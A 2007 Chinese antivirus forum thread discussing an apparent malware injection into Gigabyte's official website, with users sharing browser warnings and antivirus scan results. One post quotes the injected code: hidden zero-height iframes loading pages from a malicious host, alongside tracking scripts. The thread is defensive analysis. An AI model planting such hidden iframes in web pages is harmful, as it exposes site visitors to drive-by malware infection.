楼主: Shisoft
收起左侧

[已鉴定] 技嘉官网被植入病毒?

 关闭 [复制链接]
Shisoft
 楼主| 发表于 2007-12-31 14:55:02 | 显示全部楼层
什么东西,被我的Firefox防掉了

Suspected Attack Site!

The web site at htm1.ws has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Web site owners who believe their site has been reported as an attack site in error may request a review.
yangpizhi
发表于 2007-12-31 15:43:56 | 显示全部楼层
-----------------------------SCAN REPORT-----------------------------
F-PROT Antivirus for Windows

Antivirus Scanning Engine version number: 4.4.2
Virus signature file from: 2007-12-31, 5:54

Scan name: 12.31
Path to scan: C:\样本 yangpizhi\12.31\|

Thorough scan
Also scan: Inside subfolders, Compressed files, Streams

Scan started: 2007-12-31, 15:43:59
---------------------------------------------------------------------

[Clean]        Boot sector on drive F:
[Clean]        Boot sector on drive E:
[Clean]        Boot sector on drive D:
[Clean]        Boot sector on drive C:
[Clean]        Master Boot Record on disk 0
[Found possible security risk]         <W32/Heuristic-162!Eldorado (damaged, not disinfectable)>        C:\样本 yangpizhi\12.31\1.rar->1.exe->(UPack)
[Contains infected objects]        C:\样本 yangpizhi\12.31\1.rar
[Quarantined]        C:\样本 yangpizhi\12.31\1.rar->1.exe->(UPack)

---------------------------------------------------------------------
Scan ended:        2007-12-31, 15:44:01
Duration:        0:00:02

Scan result:

Scanned files:                 6
Infected objects:         1
Disinfected objects:         0
Quarantined files:         1
---------------------------------------------------------------------
yuyando
发表于 2007-12-31 15:47:36 | 显示全部楼层
火狐进去,拒绝它的cookies就老刷新,上面的用那个版本的FF

[ 本帖最后由 yuyando 于 2007-12-31 15:50 编辑 ]
su-tt
发表于 2007-12-31 15:50:22 | 显示全部楼层
小红伞一直响
Virus or unwanted program 'JS/Agent.ES [JS/Agent.ES]'
detected in file 'C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\WHMJWDEF\r21[1].htm.
Action performed: Delete file

Virus or unwanted program 'W32/AutoRun.BK [W32/AutoRun.BK]'
detected in file 'C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe.
Action performed: Delete file
couldsst
发表于 2007-12-31 16:28:30 | 显示全部楼层
BD
C:\a\1.rar=]1.exe Generic.Malware.SP!BdldPk!g.2F6FBB85
醉一生爱妍
发表于 2007-12-31 16:34:22 | 显示全部楼层
江民不让下
jick117
发表于 2007-12-31 17:44:23 | 显示全部楼层
追踪进去,挂了一堆:

<iframe src=http://htm1.ws/www/014.htm width=100 height=0></iframe>
<iframe src=http://htm1.ws/www/r2.htm width=100 height=0></iframe>
<iframe src=http://htm1.ws/www/bd.htm width=100 height=0></iframe>
<script language="javascript" src="http://count36.51yes.com/click.aspx?id=360631815&logo=1"></script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1519290.js"></script>
qigang
发表于 2007-12-31 18:19:23 | 显示全部楼层

回复 3楼 jimmyleo 的帖子

Rising20.25未杀耶!!
Shisoft
 楼主| 发表于 2007-12-31 21:31:57 | 显示全部楼层
Minefield FF3.0
gho
发表于 2007-12-31 21:40:47 | 显示全部楼层
1.EXE mcafee报
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-14 15:01 , Processed in 0.098530 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表